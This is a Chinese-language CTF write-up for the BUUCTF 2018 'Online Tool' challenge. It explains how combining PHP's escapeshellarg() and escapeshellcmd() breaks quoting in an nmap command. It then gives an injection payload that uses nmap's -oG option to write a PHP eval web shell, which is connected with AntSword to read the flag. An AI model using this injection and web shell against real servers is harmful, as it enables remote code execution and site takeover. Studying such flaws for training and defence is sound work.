考点:escapeshellarg()和escapeshellcmd()漏洞;
RCE漏洞
通过代码审计,传参是host,最后的输出对host利用namp扫描,
主要函数就是
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
escapeshellarg():
escapeshellarg(string $arg
): string
重点:escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。
对于用户输入的部分参数就应该使用这个函数。shell 函数包含 exec(), system() 执行运算符 。
参数:
arg
需要被转码的参数。
返回值:
转换之后的字符串
escapeshellcmd():
escapeshellcmd(string $command
): string
重点:escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。
此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。
重点:反斜线(\)会在以下字符之前插入: &#;`|*?~<>^()[]{}$\
, \x0A
和 \xFF
。 '
和 "
仅在不配对儿的时候被转义。 在 Windows 平台上,所有这些字符以及 %
和 !
字符都会被空格代替。
参数:
command
要转义的命令。
返回值:
转义后的字符串。
escapeshellarg+escapeshellcmd造成的漏洞就是经过两次转义导致单引号闭合,使得其后面的任意命令能够执行
从别的博主那里扒了一个例子可以参照理解一下:
PHP escapeshellarg()+escapeshellcmd() 之殇
传入参数是:172.17.0.2' -v -d a=1
首先经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',
即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
再经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',
这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义
最后执行的命令是curl '172.17.0.2'\\'' -v -da=1\',
由于中间的\\被解释为\而不再是转义字符,所以后面的'没有被转义,与再后面的'配对儿成了一个空白连接符。
所以可以简化为curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1’。
结合namp -oG(将命令结果写到指定文件里)
令?host=' <?php eval($_POST["cmd"]);?> -oG shell.php '
payload的理解:[BUUCTF 2018]Online Tool(超详细解析payload)_k0f1i的博客-CSDN博客_payload解析
Then:
用蚁剑链接
链接成功,直接在根目录下找到flag
flag{430b4682-a2e5-4db1-bf29-3174af62bdec}